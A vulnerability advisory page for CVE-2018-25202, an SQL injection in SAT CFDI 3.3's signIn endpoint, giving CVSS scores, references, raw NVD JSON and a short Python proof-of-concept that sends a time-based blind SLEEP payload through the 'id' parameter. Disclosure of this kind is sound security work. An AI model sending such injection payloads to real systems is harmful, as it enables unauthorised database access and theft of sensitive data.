CVE-2018-25202

Description

SAT CFDI 3.3 contains an SQL injection vulnerability that allows attackers to manipulate database queries by injecting SQL code through the 'id' parameter in the signIn endpoint. Attackers can submit POST requests with boolean-based blind, stacked queries, or time-based blind SQL injection payloads to extract sensitive data or compromise the application.

CVSS Details

CVSS Score

8.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

No configuration data available.

SAT CFDI 3.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def check_sqli(target_url):
    # Payload for time-based blind SQL injection
    # Injecting '1' AND (SELECT SLEEP(5))-- - to test for delay
    payload = {
        "id": "1' AND (SELECT SLEEP(5))-- -"
    }

    try:
        print(f"[*] Sending request to {target_url}/signIn...")
        # Send POST request to the vulnerable endpoint
        response = requests.post(f"{target_url}/signIn", data=payload, timeout=10)
        
        # Calculate response time
        response_time = response.elapsed.total_seconds()
        
        # If the response takes longer than 5 seconds, the sleep executed
        if response_time >= 5:
            print(f"[+] Vulnerability Confirmed! Response time: {response_time:.2f}s")
        else:
            print(f"[-] Vulnerability not detected. Response time: {response_time:.2f}s")
            
    except requests.exceptions.RequestException as e:
        print(f"[!] Error connecting to target: {e}")

if __name__ == "__main__":
    # Replace with actual target IP/Domain
    target = "http://127.0.0.1:8080"
    check_sqli(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2018-25202
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2018-25202
[3] CVE Details https://www.cvedetails.com/cve/CVE-2018-25202/
[4] VulDB https://vuldb.com/cve/CVE-2018-25202
[5] https://www.exploit-db.com/exploits/44726
[6] https://www.vulncheck.com/advisories/sat-cfdi-sql-injection-via-signin-endpoint
[7] https://www.wecodex.com/item/view/verification-and-validation-system-sat-cfdi-33/8

Raw JSON Data

JSON

{"cve": {"id": "CVE-2018-25202", "sourceIdentifier": "[email protected]", "published": "2026-03-26T12:16:04.850", "lastModified": "2026-03-26T15:13:15.790", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "SAT CFDI 3.3 contains an SQL injection vulnerability that allows attackers to manipulate database queries by injecting SQL code through the 'id' parameter in the signIn endpoint. Attackers can submit POST requests with boolean-based blind, stacked queries, or time-based blind SQL injection payloads to extract sensitive data or compromise the application."}, {"lang": "es", "value": "SAT CFDI 3.3 contiene una vulnerabilidad de inyección SQL que permite a los atacantes manipular consultas de la base de datos inyectando código SQL a través del parámetro 'id' en el endpoint signIn. Los atacantes pueden enviar solicitudes POST con payloads de inyección SQL ciega basada en booleanos, consultas apiladas o inyección SQL ciega basada en tiempo para extraer datos sensibles o comprometer la aplicación."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/44726", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/sat-cfdi-sql-injection-via-signin-endpoint", "source": "[email protected]"}, {"url": "https://www.wecodex.com/item/view/verification-and-validation-system-sat-cfdi-33/8", "source": "[email protected]"}]}}